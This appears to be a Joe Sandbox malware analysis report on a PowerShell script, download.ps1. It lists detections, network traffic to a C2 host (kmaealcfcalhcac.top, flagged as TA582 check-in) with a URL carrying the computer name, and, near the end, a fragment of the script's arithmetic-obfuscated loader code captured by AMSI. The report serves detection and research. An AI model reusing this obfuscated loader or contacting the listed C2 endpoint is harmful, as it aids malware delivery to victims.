Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1589105
MD5:a9b2be9576b870b7a18ed374336f68ca
SHA1:62662313b37a4daf2f209495d7217717f88eab45
SHA256:501a309ab708ccd57fe2b49aa7f7f59d694550549070f13b3031e1dd4e46108a
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 8416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8416, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8416, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T10:01:52.431349+010020577411A Network Trojan was detected192.168.11.204972345.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T10:01:52.431349+010018100002Potentially Bad Traffic192.168.11.204972345.61.136.13880TCP
2025-01-11T10:01:52.800335+010018100002Potentially Bad Traffic192.168.11.2049724142.250.190.13280TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 10%Perma Link
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.1649210717.0000019EEBF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1655104347.0000019EEE2C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1655676223.0000019EEE33E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb! source: powershell.exe, 00000000.00000002.1655676223.0000019EEE33E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb6 source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 00000000.00000002.1649210717.0000019EEBF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbpp source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdblC source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49723 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49723 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49724 -> 142.250.190.132:80
Source: global trafficHTTP traffic detected: GET /2xg70oiywchtr.php?id=computer&key=72557916474&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2xg70oiywchtr.php?id=computer&key=72557916474&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kmaealcfcalhcac.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$bs1u0lc6yvi29nx/$ajdsqn4z1yuv8br.php?id=$env:computername&key=$kifdaxpvhjmqs&s=527
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.1653873389.0000019EEE0F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top/2xg70oiywchtr.php?id=computer&key=72557916474&s=527p
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz#n
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8187F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8189B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E8188D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81892000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E818A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81884000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E818A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E81889000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz#n
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comh
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1625609417.0000019E801D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz#n
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1652565637.0000019EEDFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1625609417.0000019E80EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1643724135.0000019E90250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1625609417.0000019E80D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1625609417.0000019E813E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA340988B10_2_00007FFA340988B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34097B010_2_00007FFA34097B01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA340855DA0_2_00007FFA340855DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408E8620_2_00007FFA3408E862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408C1410_2_00007FFA3408C141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408299C0_2_00007FFA3408299C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408C2620_2_00007FFA3408C262
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408BAD80_2_00007FFA3408BAD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA340922D80_2_00007FFA340922D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34087B3D0_2_00007FFA34087B3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA3408C4320_2_00007FFA3408C432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34304DB30_2_00007FFA34304DB3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA343077230_2_00007FFA34307723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34307B430_2_00007FFA34307B43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA343087D30_2_00007FFA343087D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34332F060_2_00007FFA34332F06
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8424:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5pifqfc.ytl.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ytbc1figw46n5ou.((-join (@((194367/(-5228+8129)),(159729/(-1775+3214)),(-1871+1983),(-7426+7547),(9254-(53+9117)),(3025-2914))| ForEach-Object { [char]$_ })))( $od75v2nl4f6t1gh ) $ytbc1figw46n5ou.((-join (@((3787-3720),(-4158+4266),(6678-6567),(4184-4069),(-7942+8043))| ForEach-Object { [char]$_ })))()$3lrwqxn9zfyav2o.(([system.String]::new(@((552281/8243),(78516/(389672/536)),(-649+760),(9787-(76611912/7921)),(-5324+(11231-(-250+6056)))))))()[byte[]] $upk2ydvxm1430j7 = $od75v2nl4f6t1gh.(([system.String]::new(@((444864/(3144+2152)),(3096-(27145590/9094)),(599755/9227),(836304/7336),(-5111+(49015725/9381)),(-5662+5759),(777062/(-2325+8747))))))() $kn40rhtvf8xd9sw=$upk2ydvxm1430j7 return $kn40rhtvf8xd9sw}[System.Text.Encoding]::ascii.((-join (@((565515/(51206985/6429)),(-2299+2400),(3501-(12265-(23532000/(25620200/9668)))),(-1408+(-3008+(-2765+7264))),(7126-(35021960/4996)),(678756/(30615468/(9284-(-5919+10061)))),(59010/(7969-7407)),(249-(716962/(14450-9292))),(128647/(-6310+7559)))| ForEach-Object { [char]$_ })))((ietfgxo75q1r4wma9dyclbkz08n 